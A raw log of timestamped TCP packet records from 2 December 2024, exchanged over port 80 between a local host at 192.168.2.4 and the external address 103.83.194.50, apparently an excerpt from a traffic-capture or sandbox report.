Dec 2, 2024 07:09:45.567857981 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.567907095 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.573915005 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.573964119 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.574037075 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.574084044 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.580163956 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.580205917 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.580275059 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.580317974 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.586415052 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.586463928 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.586556911 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.586600065 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.592575073 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.592621088 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.592662096 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.592715979 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.598727942 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.598774910 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.706729889 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.706809998 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.706819057 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.706856966 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.708153963 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.708193064 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.708250999 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.708292007 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.713100910 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.713152885 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.713196993 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.713237047 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.717983007 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.718053102 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.718102932 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.718147039 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.722918987 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.722980976 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.723021030 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.723068953 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.727857113 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.727910995 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.727935076 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.727978945 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.732697010 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.732775927 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.732848883 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.732894897 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.737598896 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.737656116 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.737694025 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.737735033 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.742480040 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.742532969 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.742590904 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.742633104 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.747381926 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.747432947 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.747474909 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.747519016 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.752084017 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.752165079 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.752197981 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.752244949 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.756932020 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.756982088 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.757096052 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.757138014 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.761661053 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.761712074 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.761744022 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.761789083 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.766349077 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.766417980 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.766449928 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.766509056 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.771068096 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.771121025 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.771178961 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.771219969 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.775826931 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.775880098 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.775911093 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.775960922 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.780560017 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.780610085 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.780683041 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.780725002 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.785283089 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.785331011 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.785444975 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.785489082 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.790067911 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.790117025 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.790157080 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.790198088 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.794776917 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.794825077 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.794887066 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.794929981 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.799566031 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.799617052 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.799653053 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.799757004 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.804300070 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.804352045 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.804378986 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.804423094 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.808965921 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.809031010 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.809077024 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.809123039 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.813747883 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.813805103 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.813848972 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.813894987 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.818471909 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.818521023 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.818586111 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.818646908 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.823229074 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.823282957 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.823338985 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.823383093 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.827918053 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.827976942 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.917495012 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.917594910 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.917690992 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.917690992 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.919126034 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.919178963 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.919238091 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.919280052 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.922555923 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.922605991 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.922668934 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.922707081 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.925981998 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.926033974 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.926093102 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.926134109 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.929434061 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.929487944 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.929547071 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.929594994 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.932760954 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.932820082 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.932888985 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.932930946 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.936047077 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.936100960 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.936145067 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.936187983 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.939253092 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.939328909 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.939347982 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.939421892 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.942404985 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.942462921 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.942523003 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.942565918 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.945549011 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.945605040 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.945647955 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.945691109 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.948630095 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.948683977 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.948721886 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.948761940 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.951730013 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.951797009 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.951850891 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.951895952 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.954760075 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.954807043 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.954839945 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.954881907 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.957772017 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.957820892 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.957854033 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.957899094 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.960777998 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.960839033 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.960942984 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.960988998 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.963823080 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.963881016 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.963907957 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.963948011 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.966805935 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.966869116 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.966907978 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.966967106 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.969829082 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.969878912 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.969921112 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.969963074 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.972846985 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.972903013 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.972959042 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.973001003 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.975907087 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.975969076 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.976001978 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.976042986 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.978894949 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.979012012 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.979012012 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.979079962 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.981972933 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.982029915 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.982079029 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.982125044 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.984927893 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.984985113 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.985023975 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.985064983 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.987978935 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.988065958 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.988096952 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.988120079 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.990977049 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.991027117 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.991044998 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.991099119 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.994067907 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.994112968 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.994179010 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.994220972 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.997020960 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.997068882 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.997132063 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.997174025 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.000092030 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.000138044 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.000236988 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.000283957 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.003065109 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.003108978 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.003180027 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.003223896 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.006114960 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.006186008 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.006194115 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.006274939 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.009100914 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.009151936 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.009216070 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.009258032 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.012151957 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.012200117 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.012234926 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.012275934 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.015136003 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.015181065 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.015260935 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.015321016 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.018165112 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.018213987 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.018277884 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.018317938 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.021204948 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.021256924 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.021301031 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.021342039 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.024241924 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.024298906 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.024347067 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.024389982 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.027234077 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.027295113 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.027337074 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.027395010 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.030286074 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.030342102 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.030401945 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.030448914 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.033279896 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.033329964 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.033407927 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.033451080 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.036324978 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.036374092 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.036406040 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.036447048 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.039319992 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.039382935 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.039414883 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.039475918 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.042326927 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.042392015 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.042412043 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.042464018 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.045352936 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.045398951 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.045527935 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.045572996 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.048363924 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.048409939 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.048465014 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.048506975 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.051387072 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.051445961 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.051618099 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.051666021 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.054513931 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.054569960 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.054642916 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.054687023 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.057468891 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.057529926 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.057610989 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.057657003 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.060436010 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.060491085 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.060519934 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.060559988 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.127985001 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.128041983 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.128087044 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.128151894 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.129067898 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.129110098 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.129286051 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.129328012 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.131175995 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.131215096 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.131227016 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.131267071 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.133220911 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.133268118 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.133305073 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.133353949 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.135276079 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.135334015 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.135364056 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.135417938 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:46.137304068 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:46.137357950 CET	49736	80	192.168.2.4	103.83.194.50
